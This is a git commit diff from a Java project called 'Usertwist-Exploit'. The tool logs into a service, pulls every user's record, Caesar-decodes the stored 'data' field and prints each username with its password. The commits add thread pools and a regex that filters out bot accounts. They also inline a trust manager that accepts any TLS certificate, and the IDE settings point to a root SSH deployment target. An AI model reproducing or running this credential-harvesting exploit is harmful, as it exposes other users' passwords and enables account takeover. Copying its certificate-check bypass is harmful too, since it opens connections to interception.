Implement Thread pools

Added bot exclusion using regex
Implements virtual threads
2024-08-09 14:48:52 +02:00 · 2024-08-07 14:26:50 +02:00 · 2024-08-06 10:39:02 +02:00 · 2024-08-06 08:48:07 +02:00
8 changed files with 127 additions and 62 deletions
--- a/.idea/git_toolbox_blame.xml
+++ b/.idea/git_toolbox_blame.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="GitToolBoxBlameSettings">
+    <option name="version" value="2" />
+  </component>
+</project>
--- a/.idea/git_toolbox_prj.xml
+++ b/.idea/git_toolbox_prj.xml
@@ -0,0 +1,15 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="GitToolBoxProjectSettings">
+    <option name="commitMessageIssueKeyValidationOverride">
+      <BoolValueOverride>
+        <option name="enabled" value="true" />
+      </BoolValueOverride>
+    </option>
+    <option name="commitMessageValidationEnabledOverride">
+      <BoolValueOverride>
+        <option name="enabled" value="true" />
+      </BoolValueOverride>
+    </option>
+  </component>
+</project>
--- a/.idea/inspectionProfiles/Project_Default.xml
+++ b/.idea/inspectionProfiles/Project_Default.xml
@@ -2,7 +2,7 @@
  <profile version="1.0">
    <option name="myName" value="Project Default" />
    <inspection_tool class="AutoCloseableResource" enabled="true" level="WARNING" enabled_by_default="true">
-      <option name="METHOD_MATCHER_CONFIG" value="java.util.Formatter,format,java.io.Writer,append,com.google.common.base.Preconditions,checkNotNull,org.hibernate.Session,close,java.io.PrintWriter,printf,java.io.PrintStream,printf,java.net.http.HttpClient,newHttpClient,java.net.http.HttpClient.Builder,build" />
+      <option name="METHOD_MATCHER_CONFIG" value="java.util.Formatter,format,java.io.Writer,append,com.google.common.base.Preconditions,checkNotNull,org.hibernate.Session,close,java.io.PrintWriter,printf,java.io.PrintStream,printf,java.net.http.HttpClient,newHttpClient,java.net.http.HttpClient.Builder,build,java.util.concurrent.Executors,newFixedThreadPool|newVirtualThreadPerTaskExecutor" />
    </inspection_tool>
  </profile>
 </component>
--- a/.idea/remote-targets.xml
+++ b/.idea/remote-targets.xml
@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="RemoteTargetsManager">
+    <targets>
+      <target name="root@kyosu.fr:22" type="ssh/sftp" uuid="cb79b708-e728-4225-8df7-941abd57c841">
+        <config>
+          <option name="projectRootOnTarget" value="/root/Usertwist-Exploit" />
+          <option name="serverName" value="root@kyosu.fr:22 password" />
+        </config>
+        <ContributedStateBase type="JavaLanguageRuntime">
+          <config>
+            <option name="homePath" value="/opt/jdk-21.0.1" />
+            <option name="javaVersionString" value="17.0.11" />
+          </config>
+        </ContributedStateBase>
+      </target>
+    </targets>
+  </component>
+</project>
--- a/src/fr/motysten/usertwist/exploit/Main.java
+++ b/src/fr/motysten/usertwist/exploit/Main.java
@@ -16,6 +16,7 @@ import java.security.NoSuchAlgorithmException;
 import java.util.Arrays;
 import java.util.HashMap;
 import java.util.Map;
+import java.util.concurrent.ExecutionException;

 public class Main {

@@ -26,8 +27,9 @@ public class Main {
    public static int rotation = 4;
    public static boolean asynchronous = true;
    public static Request requestClient;
+    public static boolean ignoreBots = true;

-    public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
+    public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException, ExecutionException {
        BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));

        requestClient = new Request(false);
@@ -60,6 +62,10 @@ public class Main {
        readLine = reader.readLine();
        if (!readLine.isEmpty()) {rotation = Integer.parseInt(readLine);}

+        System.out.println("Do you want to ignore bot users ? [Y/n]");
+        readLine = reader.readLine();
+        if (readLine.equalsIgnoreCase("n")) {ignoreBots = false;}
+
        JSONObject requestJSON = new JSONObject();
        requestJSON.put("username", username);
        requestJSON.put("password", password);
@@ -132,9 +138,9 @@ public class Main {

        float startTime = System.nanoTime();
        if (asynchronous) {
-            Parser.asyncGetPass(usersArray, rotation);
+            Parser.asyncGetPass(usersArray, rotation, ignoreBots);
        } else {
-            Parser.getPass(usersArray, rotation);
+            Parser.getPass(usersArray, rotation, ignoreBots);
        }
        float elapsedTime = (System.nanoTime() - startTime) / 1000000;
        System.out.println("Asynchronous elapsed time = " + elapsedTime + "ms");
--- a/src/fr/motysten/usertwist/exploit/tools/Parser.java
+++ b/src/fr/motysten/usertwist/exploit/tools/Parser.java
@@ -3,31 +3,54 @@ package fr.motysten.usertwist.exploit.tools;
 import org.json.JSONArray;
 import org.json.JSONObject;

+import java.util.ArrayList;
+import java.util.List;
+import java.util.concurrent.ExecutionException;
+import java.util.concurrent.ExecutorService;
+import java.util.concurrent.Executors;
+import java.util.concurrent.Future;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
 public class Parser {

-    public static void getPass(JSONArray usersArray, int rotation) {
-        for (int i = 0; i < usersArray.length(); i++) {
-            JSONObject user = usersArray.getJSONObject(i);
-            String login = user.getString("username");
-            String password = Cesar.rotate(user.getString("data"), rotation);
+    private static final String regex = "(^[A-Z][A-Za-z]+[0-9][A-Z])|(^.*?([A-Z]|[0-9]{3}).*?[,?;.:/!§%*^¨$£+])";
+    private static final Pattern pattern = Pattern.compile(regex);

-            System.out.println((i + 1) + ". " + login + " => " + password);
+    public static void getPass(JSONArray usersArray, int rotation, boolean ignoreBots) {
+        for (int i = 0; i < usersArray.length(); i++) {
+            parseJSON(usersArray, rotation, ignoreBots, i);
        }
    }

-    public static void asyncGetPass(JSONArray usersArray, int rotation) {
+    public static void asyncGetPass(JSONArray usersArray, int rotation, boolean ignoreBots) throws ExecutionException, InterruptedException {
+
+        ExecutorService executor = Executors.newVirtualThreadPerTaskExecutor();
+        List<Future<String>> threads = new ArrayList<>();

        for (int i = 0; i < usersArray.length(); i++) {

            int finalI = i;
-            new Thread(() -> {
-                JSONObject user = usersArray.getJSONObject(finalI);
-                String login = user.getString("username");
-                String password = Cesar.rotate(user.getString("data"), rotation);
-
-                System.out.println((finalI + 1) + ". " + login + " => " + password);
-            }).start();
+            Future<String> t = executor.submit(() -> parseJSON(usersArray, rotation, ignoreBots, finalI));
+            threads.add(t);
+        }
+        for (Future<String> t : threads) {
+            if (t.get() != null) {
+                System.out.println(t.get());
+            }
        }
    }

+    private static String parseJSON(JSONArray usersArray, int rotation, boolean ignoreBots, int finalI) {
+        JSONObject user = usersArray.getJSONObject(finalI);
+        String login = user.getString("username");
+        String password = Cesar.rotate(user.getString("data"), rotation);
+
+        final Matcher matcher = pattern.matcher(password);
+        if (!matcher.matches() || !ignoreBots) {
+            return (finalI + 1) + ". " + login + " => " + password;
+        }
+        return null;
+    }
+
 }
--- a/src/fr/motysten/usertwist/exploit/tools/Request.java
+++ b/src/fr/motysten/usertwist/exploit/tools/Request.java
@@ -3,8 +3,11 @@ package fr.motysten.usertwist.exploit.tools;
 import org.json.JSONObject;

 import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLEngine;
 import javax.net.ssl.TrustManager;
+import javax.net.ssl.X509ExtendedTrustManager;
 import java.io.IOException;
+import java.net.Socket;
 import java.net.URI;
 import java.net.http.HttpClient;
 import java.net.http.HttpRequest;
@@ -12,6 +15,7 @@ import java.net.http.HttpResponse;
 import java.security.KeyManagementException;
 import java.security.NoSuchAlgorithmException;
 import java.security.SecureRandom;
+import java.security.cert.X509Certificate;
 import java.util.Map;

 public class Request {
@@ -22,7 +26,42 @@ public class Request {
        HttpClient.Builder builder = HttpClient.newBuilder();
        if (insecure) {
            SSLContext customContext = SSLContext.getInstance("TLS");
-            customContext.init(null, new TrustManager[]{new SSLBypass()}, new SecureRandom());
+            customContext.init(null, new TrustManager[]{new X509ExtendedTrustManager() {
+                @Override
+                public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+
+                }
+
+                @Override
+                public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+
+                }
+
+                @Override
+                public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+                }
+
+                @Override
+                public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+                }
+
+                @Override
+                public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
+
+                }
+
+                @Override
+                public void checkServerTrusted(X509Certificate[] x509Certificates, String s) {
+
+                }
+
+                @Override
+                public X509Certificate[] getAcceptedIssuers() {
+                    return new X509Certificate[0];
+                }
+            }}, new SecureRandom());
            builder.sslContext(customContext);
        }
        this.client = builder.build();
--- a/src/fr/motysten/usertwist/exploit/tools/SSLBypass.java
+++ b/src/fr/motysten/usertwist/exploit/tools/SSLBypass.java
@@ -1,43 +0,0 @@
-package fr.motysten.usertwist.exploit.tools;
-
-import javax.net.ssl.SSLEngine;
-import javax.net.ssl.X509ExtendedTrustManager;
-import java.net.Socket;
-import java.security.cert.X509Certificate;
-
-public class SSLBypass extends X509ExtendedTrustManager {
-    @Override
-    public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
-
-    }
-
-    @Override
-    public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
-
-    }
-
-    @Override
-    public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
-
-    }
-
-    @Override
-    public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
-
-    }
-
-    @Override
-    public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
-
-    }
-
-    @Override
-    public void checkServerTrusted(X509Certificate[] x509Certificates, String s)  {
-
-    }
-
-    @Override
-    public X509Certificate[] getAcceptedIssuers() {
-        return new X509Certificate[0];
-    }
-}
Author	SHA1	Message	Date
Mateo	7845417ce7	Implement Thread pools	2024-08-09 14:48:52 +02:00
Mateo	b125e250bd	Added bot exclusion using regex	2024-08-07 14:26:50 +02:00
Mateo	3aa13a9909	Implements virtual threads	2024-08-06 10:39:02 +02:00
Mateo	0142689374	Removed SSLBypass class	2024-08-06 08:48:07 +02:00